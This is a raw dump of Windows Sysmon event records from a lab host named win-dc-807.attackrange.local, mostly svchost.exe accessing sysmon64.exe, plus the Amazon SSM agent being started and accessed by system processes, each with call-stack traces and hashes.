15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001461Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001460Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001458Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001457Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-2D00-000000008801}2448C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C62-5FA1-0A00-000000008801}852912C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-2D00-000000008801}2448C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001455Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.670{D28789B6-7C73-5FA1-2D00-000000008801}2448C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=D99D0B786003034B7255BA854D2750DF,SHA256=E59FC75594AA351583476F38E8C008C2AD2119C229D9C4540EFE17AFAEF7ED34,IMPHASH=F0070935B15A909B9DC00BE7997E6112{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001454Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001452Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001451Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001450Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001448Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001447Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001445Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001444Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001443Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001442Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001441Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001440Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001439Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001438Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001437Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 